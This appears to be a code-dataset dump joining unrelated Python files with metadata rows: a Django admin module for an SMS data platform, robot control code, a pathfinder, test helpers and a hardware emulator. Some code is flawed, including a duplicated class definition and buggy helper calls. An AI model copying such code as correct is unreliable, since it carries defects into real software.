fields = ('sms_tel_number', 'outgoing_number')
search_fields = ['organization__name','organization__org_id']
ordering = ('-organization__active_date',)
def organization_name(self, obj):
return obj.organization.name
organization_name.admin_order_field = "organization__name"
def _get_ngo_admin(self, organization_setting):
user_profiles = NGOUserProfile.objects.filter(org_id=organization_setting.organization.org_id)
admin_users = [x.user for x in user_profiles if x.user.groups.filter(name="NGO Admins")]
#right now there is only one ngo admin
return admin_users[0] if is_not_empty(admin_users) else NullAdmin()
def admin_email(self, obj):
return self._get_ngo_admin(obj).email
def organization_id(self, obj):
return obj.organization.org_id
organization_id.admin_order_field = "organization__org_id"
def payment_details(self, obj):
organization = obj.organization
payment_details = PaymentDetails.objects.filter(organization=organization)
if not is_empty(payment_details):
return payment_details[0].preferred_payment
return "--"
def type(self, obj):
return obj.organization.account_type
type.admin_order_field = 'organization__account_type'
def activation_date(self, obj):
return obj.organization.active_date if obj.organization.active_date is not None else '--'
activation_date.admin_order_field = "organization__active_date"
activation_date.short_description = "Created on"
class MessageTrackerAdmin(DatawinnerAdmin):
list_display = ("organization_name", "organization_id","type", "month", "combined_total_incoming",
"total_incoming_per_month", "total_messages", "total_outgoing_messages", "outgoing_sms_count","outgoing_sms_charged_count",
"sent_reminders_count","sent_reminders_charged_count", "send_message_count","send_message_charged_count", "sms_api_usage_count","sms_api_usage_charged_count", "sms_submission", "incoming_sp_count",
"incoming_web_count", "sms_registration_count")
search_fields = ['organization__name', 'organization__org_id', 'month']
ordering = ('-month',)
def __init__(self, *args, **kwargs):
super(MessageTrackerAdmin, self).__init__(*args, **kwargs)
self.list_display_links = (None,)
def organization_name(self, obj):
return obj.organization.name
organization_name.short_description = mark_safe('Organisation<br/>name')
def type(self,obj):
return obj.organization.account_type
def organization_id(self, obj):
return obj.organization.org_id
organization_id.short_description = mark_safe('Organisation<br/>ID')
def combined_total_incoming(self, obj):
return obj.total_incoming_in_total()
combined_total_incoming.short_description = mark_safe('Total<br/>incoming<br/>Submissions<br/>(In total)')
def total_incoming_per_month(self, obj):
return obj.total_monthly_incoming_messages()
total_incoming_per_month.short_description = mark_safe('Total<br/>Incoming<br/>Submissions<br/>')
def current_month(self, obj):
return datetime.datetime.strftime(obj.month, "%m-%Y")
current_month.short_description = "Month"
def total_outgoing_messages(self, obj):
return obj.outgoing_message_count()
total_outgoing_messages.short_description = mark_safe('Outgoing Charged SMS:<br/>Total')
def total_messages(self, obj):
return obj.total_messages()
total_messages.short_description = mark_safe('Total SMS<br/>(incoming<br/>and<br/>outgoing)')
def combined_total_messages(self, obj):
return obj.combined_total_messages()
combined_total_messages.short_description = mark_safe('Total SMS<br/>(in total)')
def sms_submission(self, obj):
return obj.incoming_sms_count - obj.sms_registration_count
sms_submission.short_description = mark_safe('SMS<br/>Submissions')
def export_message_tracker_details_to_excel(modeladmin, request, query_set):
headers = ["Organization Name", "Organization Id","Type", "Month", "Total Incoming Submissions (In total)", "Total Incoming Submissions",
"Total SMS (incoming and outgoing)", "Outgoing Charged SMS: Total", "Outgoing SMS: Auto Reply", "Outgoing Charged SMS: Auto Reply",
"Outgoing SMS: Reminders", "Outgoing Charged SMS: Reminders", "Outgoing SMS: Send Message", "Outgoing Charged SMS: Send Message",
"Outgoing SMS: API", "Outgoing Charged SMS: API", "SMS Submissions", "SP Submissions", "Web Submissions", "SMS Subject Registration"]
list = []
textSearchFilter = get_text_search_filter(request.GET,MessageTrackerAdmin.search_fields)
adminPanelFilter = get_admin_panel_filter(request.GET)
filteredSms = MessageTracker.objects.all().filter(Q(**adminPanelFilter) & (textSearchFilter))
for messageTracker in filteredSms:
sms_tracker_month = ExcelDate(datetime.datetime.combine(messageTracker.month, datetime.datetime.min.time()),
'dd.mm.yyyy') if messageTracker.month else None
list.append([modeladmin.organization_name(messageTracker), modeladmin.organization_id(messageTracker),
modeladmin.type(messageTracker),
sms_tracker_month, messageTracker.total_incoming_in_total(),
messageTracker.total_monthly_incoming_messages(),
messageTracker.total_messages(), messageTracker.outgoing_message_count(),
messageTracker.outgoing_sms_count, messageTracker.outgoing_sms_charged_count,
messageTracker.sent_reminders_count, messageTracker.sent_reminders_charged_count,
messageTracker.send_message_count,
messageTracker.send_message_charged_count, messageTracker.sms_api_usage_count,
messageTracker.sms_api_usage_charged_count,
modeladmin.sms_submission(messageTracker), messageTracker.incoming_sp_count,
messageTracker.incoming_web_count, messageTracker.sms_registration_count])
response = create_excel_response(headers, list, 'tracker_list')
return response
actions = [export_message_tracker_details_to_excel]
class OrganizationChangeList(ChangeList):
def get_query_set(self):
if not self.params.get("q", ""):
return super(OrganizationChangeList, self).get_query_set()
from django.db import connection
cursor = connection.cursor()
query = """Select array_agg(DISTINCT o.org_id) from accountmanagement_organization o
inner join accountmanagement_ngouserprofile p on p.org_id = o.org_id
inner join auth_user u on u.id = p.user_id inner join auth_user_groups ug on ug.user_id = u.id
inner join auth_group g on ug.group_id = g.id and g.name = %s """
params = ["NGO Admins"]
for index, keyword in enumerate(self.params.get("q").split()):
from django_countries.countries import COUNTRIES
codes = ["'" + code + "'" for code, name in COUNTRIES if unicode(name).lower().find(keyword.lower()) != -1 ]
country_codes = ', '.join(codes) if len(codes) else "''"
query += "and " if index else "where"
query += " (o.country in (%s) " % country_codes
query += """OR u.email ilike %s OR u.first_name||u.last_name ilike %s OR o.name ilike %s
OR p.mobile_phone ilike %s OR o.address||o.addressline2||o.city||o.zipcode||o.state ilike %s
OR o.office_phone ilike %s OR o.website ilike %s OR o.org_id ilike %s
OR to_char(o.active_date, 'YYYY-MM-DD HH:MI:SS') ilike %s) """
params.extend(["%" + keyword + "%"] * 9)
cursor.execute(query, params)
org_ids = cursor.fetchone()[0]
qs = Organization.objects.filter(org_id__in=org_ids or [])
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
else:
qs = qs.order_by('-active_date')
return qs
class OrganizationChangeList(ChangeList):
def get_query_set(self):
if not self.params.get("q", ""):
return super(OrganizationChangeList, self).get_query_set()
from django.db import connection
cursor = connection.cursor()
query = """Select array_agg(DISTINCT o.org_id) from accountmanagement_organization o
inner join accountmanagement_ngouserprofile p on p.org_id = o.org_id
inner join auth_user u on u.id = p.user_id inner join auth_user_groups ug on ug.user_id = u.id
inner join auth_group g on ug.group_id = g.id and g.name = %s """
params = ["NGO Admins"]
for index, keyword in enumerate(self.params.get("q").split()):
from django_countries.countries import COUNTRIES
codes = ["'" + code + "'" for code, name in COUNTRIES if unicode(name).lower().find(keyword.lower()) != -1 ]
country_codes = ', '.join(codes) if len(codes) else "''"
query += "and " if index else "where"
query += " (o.country in (%s) " % country_codes
query += """OR u.email ilike %s OR u.first_name||u.last_name ilike %s OR o.name ilike %s
OR p.mobile_phone ilike %s OR o.address||o.addressline2||o.city||o.zipcode||o.state ilike %s
OR o.office_phone ilike %s OR o.website ilike %s OR o.org_id ilike %s
OR to_char(o.active_date, 'YYYY-MM-DD HH:MI:SS') ilike %s) """
params.extend(["%" + keyword + "%"] * 9)
cursor.execute(query, params)
org_ids = cursor.fetchone()[0]
qs = Organization.objects.filter(org_id__in=org_ids or [])
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
else:
qs = qs.order_by('-active_date')
return qs
class OrganizationAdmin(DatawinnerAdmin):
list_display = (
'name', 'org_id', 'complete_address', 'office_phone', 'website', 'paid', 'active_date', 'admin_name',
'admin_email', 'admin_mobile_number', 'sms_api_users', 'status')
actions = ['deactivate_organizations', 'activate_organizations', 'delete_organizations']
search_fields = ['name', 'address', 'addressline2', 'city', 'zipcode', 'state', 'office_phone', 'website']
ordering = ('-active_date',)
def get_changelist(self, request, **kwargs):
return OrganizationChangeList
def get_query_set(self, request, queryset, search_term):
queryset, use_distinct = super(OrganizationAdmin, self).get_search_results(request, queryset, search_term)
if search_term:
queryset = queryset.filter(ngouserprofile__title__icontains=search_term)
return queryset, use_distinct
def deactivate_organizations(modeladmin, request, queryset):
queryset.exclude(status__in=['Deactivated','Pending Activation']).update(status='Deactivated',
status_changed_datetime=datetime.datetime.now())
messages.success(request, _('The accounts selected have been deactivated successfully.'))
selected = request.POST.getlist(admin.ACTION_CHECKBOX_NAME)
orgs_id = Organization.objects.filter(org_id__in=selected).exclude(status='Pending Activation').\
values_list('org_id', flat=True)
User.objects.filter(ngouserprofile__org_id__in=orgs_id).update(is_active=False)
deactivate_organizations.short_description = "Deactivate accounts"
def activate_organizations(modeladmin, request, queryset):
queryset.exclude(status__in=['Activated','Pending Activation']).update(status='Activated', status_changed_datetime=datetime.datetime.now())
messages.success(request, _('The accounts selected have been activated successfully.'))
selected = request.POST.getlist(admin.ACTION_CHECKBOX_NAME)
orgs_id = Organization.objects.filter(org_id__in=selected).exclude(status='Pending Activation').\
values_list('org_id', flat=True)
User.objects.filter(ngouserprofile__org_id__in=orgs_id).update(is_active=True)
activate_organizations.short_description = "Activate accounts"
def delete_organizations(modeladmin, request, queryset):
orgs = queryset.filter(status__in=['Deactivated', "Pending Activation"])
for organization in orgs:
dbm = get_database_manager_for_org(organization)
organization.purge_all_data()
del dbm.server[dbm.database_name]
feed_database_name = "feed_" + dbm.database_name
feed_dbm = feeds_db_for(feed_database_name)
del feed_dbm.server[feed_database_name]
es = get_elasticsearch_handle()
try:
es.delete_index(dbm.database_name)
except Exception as e:
logging.info("Could not delete index " + str(e.message))
delete_organizations.short_description = "Delete accounts"
class Media:
css = {"all": ("/media/css/plugins/jqueryUI/jquery-ui-1.8.13.custom.css",)}
js = ("/media/javascript/jquery.js", "/media/javascript/jqueryUI/jquery-ui-1.8.13.custom.min.js",)
def sms_api_users(self, organization):
user_profiles = NGOUserProfile.objects.filter(org_id=organization.org_id)
return " , ".join([x.user.username for x in user_profiles if x.user.groups.filter(name="SMS API Users")])
def paid(self, obj):
return "No" if obj.in_trial_mode else "Yes"
def _get_ngo_admin(self, organization):
user_profiles = NGOUserProfile.objects.filter(org_id=organization.org_id)
admin_users = [x.user for x in user_profiles if x.user.groups.filter(name="NGO Admins")]
#right now there is only one ngo admin
return admin_users[0] if is_not_empty(admin_users) else NullAdmin()
def admin_email(self, obj):
return self._get_ngo_admin(obj).email
def admin_office_phone(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.get_profile().office_phone
def admin_mobile_number(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.get_profile().mobile_phone
def admin_name(self, obj):
admin_user = self._get_ngo_admin(obj)
return admin_user.first_name
def complete_address(self, obj):
complete_address = [obj.address, obj.addressline2, obj.city, obj.zipcode, obj.state, obj.country_name()]
return ", ".join([element for element in complete_address if is_not_empty(element)])
def get_readonly_fields(self, request, obj=None):
if obj:
return self.readonly_fields + ('status',)
return self.readonly_fields
class NullAdmin:
def __init__(self):
self.email = ''
self.mobile_phone = ''
self.office_phone = ''
self.first_name = ''
def get_profile(self):
return self
class CountryAdmin(admin.ModelAdmin):
ordering = ('country_name_en',)
list_display = ('country_name_en', 'country_code')
class NetworkAdmin(admin.ModelAdmin):
ordering = ('network_name',)
list_display = ('network_name', 'trial_sms_number', 'country_name')
filter_horizontal = ['country']
def country_name(self, obj):
return ' ,'.join([country.country_name for country in obj.country.all()])
class UserAdminForm(forms.ModelForm):
class Meta:
model = User
def clean(self):
cleaned_data = self.cleaned_data
if 'email' in cleaned_data:
username = cleaned_data.get('email').strip()
if not len(username):
raise forms.ValidationError("This email address is required")
existing_users_with_username = User.objects.filter(username=username)
if existing_users_with_username.count() > 0 and existing_users_with_username[0] != self.instance:
raise forms.ValidationError(
"This email address is already in use. Please supply a different email address")
cleaned_data['email'] = username
return cleaned_data
class NgoUserAdmin(DatawinnerAdmin):
list_display = ('organization_name', 'country', 'organization_id', 'admin_name', 'admin_email')
fields = ('email', )
form = UserAdminForm
def organization_name(self, obj):
profile = obj.get_profile()
return Organization.objects.get(org_id=profile.org_id).name
def country(self, obj):
return (Organization.objects.get(org_id=obj.get_profile().org_id)).country_name()
def organization_id(self, obj):
return obj.get_profile().org_id
def admin_name(self, obj):
return obj.first_name
def admin_email(self, obj):
return obj.email
def queryset(self, request):
qs = super(NgoUserAdmin, self).queryset(request)
return qs.filter(groups=Group.objects.filter(name="NGO Admins"))
def save_model(self, request, obj, form, change):
username = form.cleaned_data['email']
obj.username = username
obj.email = username
obj.save()
class DWUserChangeForm(UserChangeForm):
organization_id = CharField(label="Organization ID")
def __init__(self, *args, **kwargs):
super(DWUserChangeForm, self).__init__(*args, **kwargs)
self.fields['organization_id'] = CharField(label="Organization ID")
if self.instance:
self.organization_id_field()
self.fields['password'].widget.attrs['readonly'] = 'readonly'
self.fields['first_name'].label = "Name"
class Meta:
model = User
def organization_id_field(self):
org_id = ''
try:
user_profile = NGOUserProfile.objects.get(user=self.instance)
org_id = user_profile.org_id
except:
pass
self.fields['organization_id'] = CharField(label="Organization ID", initial=org_id)
def clean_organization_id(self):
org_id = self.cleaned_data.get('organization_id', '')
try:
org = Organization.objects.get(org_id__iexact=org_id)
return org.org_id
except Organization.DoesNotExist:
raise ValidationError('Organization with id : %s does not exist.Please enter a valid id' % org_id)
def _remove_default_name_fields():
user_display_fields = list(UserAdmin.list_display)
user_display_fields.remove('first_name')
user_display_fields.remove('last_name')
return tuple(user_display_fields)
def export_user_list_to_excel(a,b,c):
#Custom Method to export user details.
def is_required(user):
return True if user.groups.filter(name="NGO Admins").count() or user.groups.filter(name="Project Managers").count() else False
def user_role(user):
if user.groups.filter(name='NGO Admins').count():
return 'Admin'
elif user.groups.filter(name='Project Managers').count():
return 'User'
list = []
for ngo_user in NGOUserProfile.objects.all():
try:
user = User.objects.get(id=ngo_user.user_id)
if is_required(user) and not user.is_superuser:
details = []
details.append(user.first_name + ' ' + user.last_name)
details.append(user.username)
org_id = ngo_user.org_id
organization = Organization.objects.get(org_id = org_id)
details.append(organization.name)
details.append(organization.status)
details.append(organization.language)
details.append(user_role(user))
list.append(details)
except Exception:
continue
headers = ['Name', 'email', 'Organization Name', 'Status', 'Account language','User Role']
response = create_excel_response(headers,list,'user_list')
return response
class DWUserAdmin(UserAdmin):
list_filter = ('groups__name',)
UserAdmin.fieldsets = (
(None, {'fields': ('username', 'password')}),
(_('Personal info'), {'fields': ('first_name', 'email')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
(_('Membership'), {'fields': ('groups', 'organization_id')}),
)
readonly_fields = ('last_login', 'date_joined')
list_display = _remove_default_name_fields() + ('name','organization_name', 'organization_id')
form = DWUserChangeForm
actions = [export_user_list_to_excel]
def name(self,obj):
return obj.first_name
def organization_name(self, obj):
org_id = NGOUserProfile.objects.get(user=obj).org_id
return Organization.objects.get(org_id=org_id).name
def organization_id(self, obj):
return NGOUserProfile.objects.get(user=obj).org_id
def save_model(self, request, obj, form, change):
super(DWUserAdmin, self).save_model(request, obj, form, change)
if change:
if 'email' in form.changed_data or 'username' in form.changed_data:
try:
existing_digests = PartialDigest.objects.filter(user=obj)
if existing_digests:
for existing_digest in existing_digests:
existing_digest.delete()
except PartialDigest.DoesNotExist:
pass
if form.cleaned_data.get('organization_id') is not None:
try:
user_profile = NGOUserProfile.objects.get(user=obj)
user_profile.org_id = form.cleaned_data['organization_id']
user_profile.save()
except NGOUserProfile.DoesNotExist:
user_profile = NGOUserProfile()
user_profile.org_id = form.cleaned_data['organization_id']
user_profile.title = 'Title'
user_profile.user = obj
user_profile.save()
admin.site.unregister(Group)
admin.site.unregister(User)
admin.site.register(OrganizationSetting, OrganizationSettingAdmin)
admin.site.register(OutgoingNumberSetting, admin.ModelAdmin)
admin.site.register(SMSC, admin.ModelAdmin)
admin.site.register(MessageTracker, MessageTrackerAdmin)
admin.site.register(Organization, OrganizationAdmin)
admin.site.register(Country, CountryAdmin)
admin.site.register(Network, NetworkAdmin)
admin.site.register(User, DWUserAdmin)
| 44.194595 | 218 | 0.677471 | 21,064 | 0.858774 | 0 | 0 | 0 | 0 | 0 | 0 | 5,384 | 0.219504 |
cddabebcaa2a91087a2f9f94dcd4f545a6f38cff | 283 | py | Python | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| null | null | null | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| 1 | 2022-03-12T20:41:21.000Z | 2022-03-13T06:34:30.000Z | tests/conftest.py | bayashi-cl/expander | b3623b656a71801233797e05781295a6101fefd8 | [
"CC0-1.0"
]
| null | null | null | import pytest
from unittest import mock
import os
import pathlib
@pytest.fixture(scope="session", autouse=True)
def set_pythonpath():
testlib_path = pathlib.Path.cwd() / "tests" / "testlib"
with mock.patch.dict(os.environ, {"PYTHONPATH": str(testlib_path)}):
yield
| 23.583333 | 72 | 0.713781 | 0 | 0 | 168 | 0.59364 | 215 | 0.759717 | 0 | 0 | 37 | 0.130742 |
cddacc9ad1d4172e5208503da82fc4edfb83363e | 1,870 | py | Python | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| 1 | 2020-03-20T22:19:05.000Z | 2020-03-20T22:19:05.000Z | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| 3 | 2020-02-14T14:36:27.000Z | 2020-04-03T21:06:27.000Z | init/global_eq_FCtest/setup_fns.py | mattzett/GEMINI-examples | 9932cee67e88898bd00c34bab7ac0568e92e40ca | [
"Apache-2.0"
]
| null | null | null | # This is mostly a repeat of model.setup from the pygemini repository except for that it setups up a periodic
# grid for us in full-globe simulations.
from __future__ import annotations
import argparse
from pathlib import Path
import typing as T
import shutil
import os
from gemini3d.config import read_nml
import gemini3d.model
def model_setup(path: Path | dict[str, T.Any], out_dir: Path, gemini_root: Path = None):
"""
top-level function to create a new simulation FROM A FILE config.nml
Parameters
----------
path: pathlib.Path
path (directory or full path) to config.nml
out_dir: pathlib.Path
directory to write simulation artifacts to
"""
# %% read config.nml
if isinstance(path, dict):
cfg = path
elif isinstance(path, (str, Path)):
cfg = read_nml(path)
else:
raise TypeError("expected Path to config.nml or dict with parameters")
if not cfg:
raise FileNotFoundError(f"no configuration found for {out_dir}")
cfg["dphi"]=90.0
cfg["out_dir"] = Path(out_dir).expanduser().resolve()
if gemini_root:
cfg["gemini_root"] = Path(gemini_root).expanduser().resolve(strict=True)
for k in {"indat_size", "indat_grid", "indat_file"}:
cfg[k] = cfg["out_dir"] / cfg[k]
# FIXME: should use is_absolute() ?
for k in {"eq_dir", "eq_archive", "E0dir", "precdir"}:
if cfg.get(k):
cfg[k] = (cfg["out_dir"] / cfg[k]).resolve()
# %% copy input config.nml to output dir
input_dir = cfg["out_dir"] / "inputs"
input_dir.mkdir(parents=True, exist_ok=True)
shutil.copy2(cfg["nml"], input_dir)
os.environ["GEMINI_ROOT"]="~/libs/bin/"
# %% is this equilibrium or interpolated simulation
if "eq_dir" in cfg:
gemini3d.model.interp(cfg)
else:
gemini3d.model.equilibrium(cfg)
| 29.68254 | 109 | 0.652941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 833 | 0.445455 |
cddc0485c396754b68315d1f0f82db760ff25dc5 | 2,580 | py | Python | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | floodfill_pathfinding.py | mnursey/Battlesnake-2021 | 884b9cf1b40c9b03cc49bd1594135e7caf41ee82 | [
"MIT"
]
| null | null | null | import board
class Floodfill:
frontier = []
grid = None
board = None
def __init__(self, game_board, start_cord):
self.board = game_board
self.grid = [[None for i in range(self.board.width)] for j in range(self.board.width)]
start_node = self.create_node(start_cord["x"], start_cord["y"], False, None)
self.frontier_add(start_node)
self.grid[start_cord['x']][start_cord['y']] = start_node
self.solve()
return
def solve(self):
while len(self.frontier) > 0:
current = self.frontier_pop()
if not current["blocked"]:
for n in self.board.neighbours(current["x"], current["y"]):
# Add to frontier if we haven't seen it
if self.grid[n['x']][n['y']] == None:
unseen_node = self.create_node(n['x'], n['y'], self.board.isBlocked(n['x'], n['y']), current)
self.grid[n['x']][n['y']] = unseen_node
self.frontier_add(unseen_node)
return
def path(self, target_cord):
node = self.grid[target_cord['x']][target_cord['y']]
path = []
while node:
path.append({"x" : node["x"], "y" : node["y"]})
node = node["from"]
path.reverse()
return path
def frontier_add(self, node):
self.frontier.append(node)
return
def frontier_pop(self):
return self.frontier.pop(0)
def create_node(self, x, y, blocked, prev):
return {"x" : x, "y" : y, "blocked" : blocked, "from" : prev}
def print(self):
output = "Grid:\n"
for y in range(self.board.width):
line = "\n"
for x in range(self.board.width):
node = self.grid[x][self.board.width - y - 1]
value = "-"
if node:
if node["from"] == None:
value = "s"
elif node["blocked"]:
value = "x"
else:
if node["from"]["x"] < node["x"]:
value = "<"
if node["from"]["x"] > node["x"]:
value = ">"
if node["from"]["y"] < node["y"]:
value = "v"
if node["from"]["y"] > node["y"]:
value = "^"
line = line + value
output += line
print(output)
return
| 27.446809 | 117 | 0.445736 | 2,565 | 0.994186 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.089922 |
cddc0ce80665ce382edeabc67713697083130041 | 3,736 | py | Python | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| null | null | null | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| 2 | 2019-06-17T23:38:23.000Z | 2019-06-17T23:39:43.000Z | Gobot-Omni/robot.py | FRC1076/2019-Parade | 3824449ed10e33b401efb646fd2e6470c3941c8b | [
"MIT"
]
| null | null | null | import wpilib
import ctre
from wpilib.drive import DifferentialDrive
from wpilib.interfaces import GenericHID
#MOTOR PORTS
LEFT = 1
RIGHT = 3
CENTER1 = 2
CENTER2 = 4
#BALL MANIPULATOR
BALL_MANIP_ID = 5
GATHER_SPEED = 1.0
SPIT_SPEED = -1.0
STOP_SPEED = 0.0
LEFT_HAND = GenericHID.Hand.kLeft
RIGHT_HAND = GenericHID.Hand.kRight
class MyRobot(wpilib.TimedRobot):
def robotInit(self):
"""Robot initialization function"""
# object that handles basic drive operations
self.leftVictor = ctre.WPI_VictorSPX(LEFT)
self.rightVictor = ctre.WPI_VictorSPX(RIGHT)
self.centerVictor1 = ctre.WPI_VictorSPX(CENTER1)
self.centerVictor2 = ctre.WPI_VictorSPX(CENTER2)
self.left = wpilib.SpeedControllerGroup(self.leftVictor)
self.right = wpilib.SpeedControllerGroup(self.rightVictor)
self.center1 = wpilib.SpeedControllerGroup(self.centerVictor1)
self.center2 = wpilib.SpeedControllerGroup(self.centerVictor2)
self.myRobot = DifferentialDrive(self.left, self.right)
self.myRobot.setExpiration(0.1)
# joysticks 1 & 2 on the driver station
# self.leftStick = wpilib.Joystick(0)
# self.rightStick = wpilib.Joystick(1)
self.DEADZONE = 0.4
self.LEFT = GenericHID.Hand.kLeft
self.RIGHT = GenericHID.Hand.kRight
self.driver = wpilib.XboxController(0)
self.ballManipulator = BallManipulator(ctre.WPI_VictorSPX(BALL_MANIP_ID))
def autonomousInit(self):
self.myRobot.tankDrive(0.8, 0.8)
def autonomousPeriodic(self):
self.myRobot.tankDrive(1, 0.5)
def teleopInit(self):
"""Executed at the start of teleop mode"""
self.myRobot.setSafetyEnabled(True)
def setCenters(self, speed_value):
self.center1.set(-speed_value)
self.center2.set(speed_value)
def deadzone(self, val, deadzone):
if abs(val) < deadzone:
return 0
return val
def teleopPeriodic(self):
ballMotorSetPoint = 0
if self.driver.getBumper(self.LEFT):
ballMotorSetPoint = 1.0
elif self.driver.getBumper(self.RIGHT):
ballMotorSetPoint = -1.0
else:
ballMotorSetPoint = 0.0
self.ballManipulator.set(ballMotorSetPoint)
"""Runs the motors with tank steering"""
#right = self.driver.getY(self.RIGHT)
#left = self.driver.getY(self.LEFT)
#self.myRobot.tankDrive(right, left)
forward = -self.driver.getRawAxis(5)
rotation_value = rotation_value = self.driver.getX(LEFT_HAND)
forward = deadzone(forward, 0.2)
self.myRobot.arcadeDrive(forward, rotation_value)
center_speed = self.driver.getX(self.RIGHT)
self.setCenters(self.deadzone(center_speed, self.DEADZONE))
class BallManipulator:
"""
Manipulator wraps a motor controller that gathers and spits
out the cargo balls.
"""
def __init__(self, motor):
self.motor = motor
def gather(self, speed = GATHER_SPEED):
self.motor.set(speed)
def spit(self, speed = SPIT_SPEED):
self.motor.set(speed)
def stop(self):
self.motor.set(STOP_SPEED)
def set(self, setValue):
"""
Direct control to be used with a controller
that puts out f, 0, and -f for gather, stop,
and spit, respectively.
"""
self.motor.set(setValue)
def deadzone(val, deadzone):
if abs(val) < deadzone:
return 0
elif val < (0):
x = ((abs(val) - deadzone)/(1-deadzone))
return (-x)
else:
x = ((val - deadzone)/(1-deadzone))
return (x)
if __name__ == "__main__":
wpilib.run(MyRobot) | 27.470588 | 81 | 0.646413 | 3,115 | 0.833779 | 0 | 0 | 0 | 0 | 0 | 0 | 674 | 0.180407 |
cddcaaf10bf47f30133fae7ab0e9db139ac2e1cc | 1,789 | py | Python | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 11 | 2017-03-01T18:00:30.000Z | 2021-12-10T05:11:02.000Z | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 397 | 2016-07-08T14:39:46.000Z | 2022-03-30T12:45:09.000Z | src/tests/test_decorators.py | elifesciences/builder | 161829686f777f7ac7f97bd970395886ba5089c1 | [
"MIT"
]
| 14 | 2016-07-13T08:33:28.000Z | 2020-04-22T21:42:21.000Z | from . import base
from mock import patch
import decorators
class TestDecorators(base.BaseCase):
@patch('decorators.LOG.info')
def test_timeit_smoke_test(self, info):
@decorators.timeit
def some_task(param, **kwargs):
pass
some_task(42, option='value')
(args, _) = info.call_args
self.assertIsInstance(args[0], str)
self.assertEqual(args[1], 'some_task')
self.assertEqual(args[2], (42,))
self.assertEqual(args[3], {'option': 'value'})
self.assertIsInstance(args[4], float)
self.assertGreater(args[4], 0.0)
def test_deffile(self):
self.assertEqual('/tmp/template.json', decorators.deffile('template.json'))
def test_setdefault(self):
decorators.setdefault('.active-stack', 'lax--ci')
with open('/tmp/.active-stack') as f:
self.assertEqual(f.read(), 'lax--ci')
@patch('buildercore.core.active_stack_names', return_value=['dummy1--ci'])
@patch('utils.get_input', return_value='1')
def test_requires_aws_project_stack(self, get_input, active_stack_names):
@decorators.requires_aws_project_stack('dummy1')
def some_task(stackname):
self.assertEqual('dummy1--ci', stackname)
return 'result'
self.assertEqual(some_task('dummy1--ci'), 'result')
@patch('buildercore.core.active_stack_names', return_value=['dummy1--ci', 'dummy1--end2end'])
@patch('utils.get_input', return_value='2')
def test_requires_aws_stack(self, get_input, active_stack_names):
@decorators.requires_aws_stack
def some_task(stackname):
self.assertEqual('dummy1--end2end', stackname)
return 'result'
self.assertEqual(some_task('dummy1--end2end'), 'result')
| 38.06383 | 97 | 0.653438 | 1,727 | 0.965344 | 0 | 0 | 1,375 | 0.768586 | 0 | 0 | 395 | 0.220794 |
cddea9a721eee8e3cc13555afb08ee013159480b | 2,158 | py | Python | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | ["MIT"] | null | null | null | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | ["MIT"] | null | null | null | integration/emulator/device.py | cvlabmiet/master-programming-example | 8a4a231ba2b72a93ae14da2c04e17b2ae3fc6651 | ["MIT"] | null | null | null |
import re, operator, array
from collections import namedtuple


class Argument(object):
    def __init__(self, viewtype, begin, end=None):
        self.type = viewtype
        self.begin = int(begin)
        self.end = None
        if end is not None:
            self.end = int(end)


class Lram(bytearray):
    pass


class Pram(Lram):
    def __init__(self):
        # grammar: [<output>]<operation>(<input0>[, <input1>, ...])
        # <output>, <input0>, ... - <type>:<begin>[:<end>] (begin, end - bytes offsets)
        # <type> - u8, i8, u16, i16, ...
        # <operation> - add, sub, div, mod, mul, ...
        # <begin>, <end> - int
        # example: [i16:200:400]add(u8:0, u8:100)
        self.instruction = re.compile(r'\[(?P<out>[^\]]+)\](?P<op>\w+)\((?P<in>[^\)]+)\)')
        self.operation = dict(add=operator.add, mul=operator.mul, mod=operator.mod, sub=operator.sub, div=operator.truediv)
        self.type = dict(i8='b', u8='B', i16='h', u16='H', i32='l', u32='L', f32='f')

    def _parse_arguments(self, op, lram):
        arguments = [Argument(*x.split(':')) for x in op.split(',')]
        return [memoryview(lram)[x.begin:x.end].cast(self.type[x.type]) for x in arguments]

    def _vectorize(self, op, output, inputs):
        for x in zip(range(len(output)), *inputs):
            output[x[0]] = op(*x[1:])

    def run(self, lram):
        operations = self.instruction.findall(str(self).replace(' ', ''))
        for op in operations:
            outputs = self._parse_arguments(op[0], lram)
            inputs = self._parse_arguments(op[2], lram)
            self._vectorize(self.operation[op[1]], outputs[0], inputs)
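
# Illustrative PRAM program (not part of the original module), following the
# grammar documented above: one instruction that adds the u8 values at byte
# offsets 0..99 to those at offsets 100..199 and writes the u8 results to
# offsets 200..299:
#
#     [u8:200:300]add(u8:0, u8:100)
#
# Pram.run() extracts such instructions with self.instruction and applies the
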